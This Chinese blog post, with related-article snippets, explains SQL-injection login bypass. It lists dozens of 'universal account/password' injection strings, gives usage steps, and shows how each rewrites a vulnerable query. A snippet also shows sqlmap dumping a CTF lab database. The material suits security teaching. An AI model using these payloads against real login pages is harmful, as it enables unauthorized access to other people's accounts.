万能账号密码使用详解,黑客常用的入门级操作

最新推荐文章于 2024-07-27 12:20:46 发布
最新推荐文章于 2024-07-27 12:20:46 发布
阅读量7.5k 收藏 57
点赞数 6
文章标签: python 数据库 java mysql 数据分析
原文链接:https://mp.weixin.qq.com/s?__biz=MzU3Mzk1ODA5OQ==&mid=2247506340&idx=1&sn=e4b7e64b6e8a775bd653ece1c20f481e&chksm=fd3b2b18ca4ca20e89113a3d46908d71f838507a32bc1cf739ef0569b32f0ba6858afc758818&scene=126&&sessionid=0
版权

一、什么是万能账号密码

我们平时登录账号时,如果是第一次登录,系统会提示我们注册账号,并将我们注册的账号和密码保存到数据库中。当我们再次登录时,系统会将我们输入的账号和密码和数据库中的数据进行匹配,匹配成功能登录。这就意味着我们需要知道一个已经注册过并且正确的账号和密码才能进行登录,那如果我不小心忘记了我的账号或者密码,或者我压根就不知道账号和密码,还有没有办法登录呢?答案是肯定的,那就是 【万能账号密码】

万能账号密码是指 【万能账号】和 【万能密码】,顾名思义,就是可以 【登录任意网站】的账号和密码

c5f49f90418aa97dbbae591ba1b10225.png


1、万能账号

当我们不知道用户的账号并且不知道用户的密码时,可以使用万能账号。

万能账号并不是一个真正意义上的账号,它是一种【拥有不同变体的格式】
需要注意的是,以下所有万能账号中的 a 可以是自定义的数字或字母,比如 1,2,3,b,c,d

【数值型万能账号】

  1. a or true #

  2. a or 1 #

  3. a or 1=1 #

  4. a or true -- a

  5. a or 1 -- a

  6. a or 1=1 -- a

【单引号字符型万能密码】

  1. a' or true #

  2. a' or 1 #

  3. a' or 1=1 #

  4. a' or true --a

  5. a' or 1 -- a

  6. a' or 1=1 -- a

【双引号字符型万能密码】

  1. a" or true #

  2. a" or 1 #

  3. a" or 1=1 #

  4. a" or true -- a

  5. a" or 1 -- a

  6. a" or 1=1 -- a


1.1 万能账号的使用

  • 账号输入 【万能账号】, 比如 a or true #

  • 密码随便输入,比如 123456


2、万能密码

当我们知道用户的账号,但不知道用户的密码时,可以使用万能密码

万能密码并不是一个真正意义上的密码,而是一个【拥有不同变体的格式】
需要注意的是:万能密码中的 admin,必须是真实的用户名

【数值型万能密码】

  1. admin #

  2. admin -- a

【单引号字符串型万能密码】

  1. admin' #

  2. admin' -- a

【双引号字符串型万能密码】

  1. admin” #

  2. admin" -- a


2.1 万能密码的使用

  • 用户名输入 【万能密码】,比如 admin’ #

  • 密码随便输入,比如 123456


三、万能账号密码原理剖析

一个网络安全意识淡薄的网站,其登录功能的SQL语句大概是下面这个样子

select * from user where username='user' and password='pass'


1、万能账号原理

当我们在登录界面输入 【万能账号】比如 a’ or true # 以后,后端会将我们输入的参数拼接到SQL中,然后去数据库中查询账号和密码,SQL语句大概是下面这样

select * from user where username='a' or true #' and password='pass'

由于 # 在SQL中是注释符,注释符后面的内容不起作用,所以真正执行的SQL语句大概是下面这样

select * from user where username='a' or true

or true 会使SQL语句恒成立,从而查询出数据库中的所有账号和密码,从而使我们成功登录

1.1 注释符

除了 # 以外, -- 也是SQL中的注释符,但SQL的语法格式规定--和后面的注释内容必须间隔一个空格,所以这需要使用 a' or 1 -- a 而不是 a' or 1 -- 其原理和 a’ or 1 # 大同小异,拼接到SQL中大概是下面这样

select * from user where username='a' or true -- a' and password='pass'

注释后面的内容不生效,真正执行的SQL大概是下面这样

select * from user where username='a' or true

SQL语句恒成立,从而登录成功


换句话来说,a' or true -- a经过SQL的转化后,结果等价于 a’ or true #


1.2 比较运算符

SQL中规定,非布尔类型的数据参与比较运算时,会转化为布尔类型再参与运算。比如 or 1 或者 or 1=1 ,会转化为布尔类型的 true 再参与 or 的比较运算,也就是变成 or true ,同样能使条件恒成立,从而登录成功

简单来讲就是:a' or 1 # 或者 a' or 1=1 # 等价于 a' or true #

2、万能密码原理

当我们在登录界面输入 【万能密码】 比如 admin’ # 以后,后端会将我们输入的参数拼接到SQL中,大概是下面这样

select * from user where username='admin' #' and password='pass'

由于 # 在SQL中是注释符,注释符后面的内容不起作用,所以真正执行的SQL大概是下面这样

select * from user where username='admin'

SQL只会在数据库中查询用户名,而不是同时查询用户名和密码,这就意味着,只要用户名正确,就可以登录成功

3.1 注释符

除了 # ,-- 在SQL中也是注释符,SQL的语法格式规定 --后面必须使用空格来间隔后面的注释内容,所以需要将 --写作 -- a,后面的 a 可以是任意数字或者字母

简单来件就是 admin’ – a 等价于 admin‘ #

总结

【万能账号密码】适用于网络安全意识较差的网站,如果发现了可以使用的网站,切勿进行下一步操作,动歪脑筋的同学请在心理默念三遍:【我国有一部完整且历史悠久的法律】

来源:blog.csdn.net/wangyuxiang946/article/details/120604024

b4ad074305b567811fefb8a09054869a.png 阅读更多

38ecda0d25857629fc5faf2be40bb9e2.gif

Python小二
关注
  • 6
    点赞
  • 57
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及蚁剑管理员提权(四)
杨秀璋的专栏
03-27 1万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,各种Web渗透工具及操作串联在一起,挺有意思的。本文详细讲解了hack the box机器配置,通过OpenAdmin题目分享管理员权限Flag获取流程,希望对您有所帮助。同时,该网站题目细节不便于透露,推荐大家亲自去尝试,本文更多的分享一些思想。
[网络安全自学篇] 五十六.i春秋老师分享小白渗透之路及Web渗透技术总结
杨秀璋的专栏
03-05 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文讲解了Windows漏洞利用知识和DEP堆栈执行保护机制,通过构造ROP链来绕过DEP保护,并编写漏洞利用脚本并实现自动化攻击。本文将分析i春秋YOU老师的小白渗透之路,并结合作者系列文章总结Web渗透技术点,非常适合初学者学习,希望对您有所帮助~
2024年oracle账号共享_oracle账号分享,网络安全开发技巧
m0_54903333的博客
05-05 2008
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。各位小伙伴,在oracle官网下载JDK需要oracle账号,本人提供账号共享,方便大家下载,希望大家不要改密码,方便更多的人。之前有小伙伴改了密码,现在已恢复,希望大家别改密码了,方便大家。
android安卓源码海量项目合集打包-1
热门推荐
chenhao0568的专栏
06-11 13万+
下载地址 最后更新共计113个分类5177套源码29.2 GB。 卷 新加卷 的文件夹 PATH 列表 卷序列号为 00000200 5E7A:7F30 F:. ├─前台界面 │ ├─3D标签云卡片热门 │ │ Android TagCloudView云标签的灵活运用.rar │ │ Android 实现 标签 拖动 改变位置.rar │ │ android 流式布局和热门标签.zip │ │ ...
Linux 的常用系统及网络命令
waterif的专栏
12-21 6127
(转载自http://blog.chinaunix.net/uid-8031155-id-2518955.html) Linux下常用命令收集整理 Linux 的常用网络命令  计算机网络的主要优点是能够实现资源和信息的共享,并且用户可以远程访问信息。Linux提供了一组强有力的网络命令来为用户服务,这些工具能够帮助用户登录到远程计算机上、传输文件和执行远程命令等
深入浅出 SSL 管理配置实战
GitChat
04-12 7140
课程介绍 我们生活在一个信息大爆炸的时代,几乎每天都在和互联网打交道,购物、网银转账、支付宝付款、搜索信息、查看邮件、观看视频、微信聊天、上网冲浪、阅读新闻等,无不时时刻刻在和网络打交道。那如何保护网络安全就相当重要了,其方法有很多,其中应用最为广泛的就是使用 SSL 来保护 C/S 或者 B/S 的通信安全。 SSL 能够帮助系统在客户端和服务器之间建立一条安全通信通道。SSL 安全协议是由 N...
渗透测试 ( 1 ) --- 相关术语、必备 工具、导航、全流程总结、入侵网站思路
freeking101的博客
07-02 2万+
在学习某项技能的时,要用最快的时间摸索清楚最少必要知识 (MAKE)都有哪些? 然后迅速地掌握它们,这样就实现了 "快速入门",然后就可以开始动手实践,然后在实践中验证理论、加深理解,同时继续扩展学习。而学习黑客也是同样的道理,对于新手小白的第一课应该是以掌握基础的安全工具为主,这样在学习的同时可以进行实践,验证所学的知识,同时加以扩展,这样学习效率会大大提升.........................................................
视频教程
FIGHTING!!!
01-21 2万+
又来一大波好东西,赶快收藏,下载吧,淘宝上就不用花钱买了 时间 2014-08-28 15:37:52  CSDN博客 原文  http://blog.csdn.net/u014304293/article/details/38898969 主题 电子商务 特别说明:如下是相关视频的解压密码,还有上次发的视频的解压密码,都在下面了
渗透测试 ( 2 ) --- 渗透测试系统、靶机、GoogleHacking、kali工具
freeking101的博客
07-02 4993
基于 Windows、Linux、Android 的渗透测试系统
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3091
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
Linux 入门常用命令 password — 修改密码,改变用户
09-16
### Linux入门常用命令详解:passwd 和 su #### passwd 命令详解 **用途:** `passwd` 命令是 Linux 系统中最常用的命令之一,主要用于更改用户账户的密码。无论是对于新创建的用户还是已经存在的用户,都需要通过...
详解Python使用tensorflow入门指南
09-20
本篇文章主要介绍了详解Python使用tensorflow入门指南,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
数据库账号密码加密详解及实例
01-21
数据库账号密码加密详解及实例 数据库中经常有对数据库账号密码的加密,但是碰到一个问题,在使用UserService对密码进行加密的时候,spring security 也是需要进行同步配置的,因为spring security 中验证的加密方式...
Oracle包应用详解入门级
02-10
Oracle包应用详解入门级
组态王入门详解
03-20
组态软件是工业控制应用软件的开发平台,它提供了一个良好的开发环境,如:提供了很多绘图元素、控件、报表格式、报警方式等。使 介绍了关于组态王入门详解的详细说明,提供组态王的技术资料的下载。
快醒醒,别睡了!...讲《数据分析pandas库》了—/—<4>
最新发布
qq_64603703的博客
07-27 955
详细解说数据分析pandas库中的常用方法
全网最详细Gradio教程系列5——Gradio Client: python
shao918516的博客
07-26 1052
程序部署完成后,如何将Gradio App作为API访问使用呢,这就用到Gradio Client。本章讲解Gradio Client的三种使用方式:pythonjavascript和curl,受字数限制,所以分三篇博客发布。 使用Gradio Python Client非常易于将Gradio应用程序作为API使用,本节讲述gradio_client安装、如何连接Gradio应用程序、查看可用API及其使用方式、job及session等用法。 通过Gradio Python Cli
全面解析 SnowNLP:中文文本处理、情感分析
有勇气的牛排博客
07-24 718
SnowNLP 是一个专门用于处理中文文本的 Python库。分词情感分析关键词提取文本分类拼音转换繁体转简体词相似度计算等测试环境:Python3.10.9尚未测出该功能text = "有勇气的牛排写的文章通俗易懂,爱了爱了"文本分类使用的是 SnowNLP 的情感分析模型。
sqlmap万能密码
08-15
根据引用和引用中提到的方法,你可以使用sqlmap进行post注入攻击来获取数据库信息。引用中的命令 "sqlmap -u "http://192.168.87.172/index.php" --data="user='='&pass='='" --dbs" 可以用来获取数据库名。然后使用引用中的命令 "sqlmap -u "http://192.168.87.172/index.php" --data="user='='&pass='='" --D user –tables" 查找表名。最后,使用引用中的命令 "sqlmap -u "http://192.168.87.172/index.php" --data="user='='&pass='='" -D user -T flll4g -C "key" –dump" 来获取字段key的数据。这样你就可以找到flag信息了。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [CTF---Web---SQL注入---01---万能密码+sqlmap](https://blog.csdn.net/qq_22160557/article/details/119194712)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值